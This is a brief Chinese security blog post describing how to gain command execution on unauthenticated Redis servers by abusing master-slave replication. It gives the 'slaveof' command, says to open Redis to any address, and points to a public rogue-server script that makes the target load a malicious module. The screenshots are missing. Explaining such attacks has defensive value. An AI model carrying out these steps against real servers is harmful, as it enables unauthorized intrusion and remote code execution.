Redis主从复制

redis主从复制,前几天分享的新版redis未授权利用的新型方式。

什么是主从复制,http://blog.itpub.net/31545684/viewspace-2213629/

通过redis命令来设置主从机

127.0.0.1:6379> slaveof 192.168.253.131 6379

被设置的主机将通过SYNC来和主机通信, 通过日志可以看到请求的sync连接。

首先需要一个高版本的redis服务,https://redis.io/download。下载后按照官网给的安装步骤来安装。

安装后修改redis.conf文件来执行redis,修改文件中的绑定本地地址的参数项,开启任意地址访问。

1563024704044

执行命令:src/redis-server ./redis.conf,开启redis成功。

1563023912222

下载脚本:https://github.com/Dliv3/redis-rogue-server。启动执行脚本

脚本执行完后显示:

1563025997123

同时可以看到redis日志中加载了so文件:

1563026034882

连接redis执行命令:

1563026095498

所以在未授权访问和弱密码登陆的情况下此问题才可以利用。

原文章:https://paper.seebug.org/975/





# web安全  

tocToc: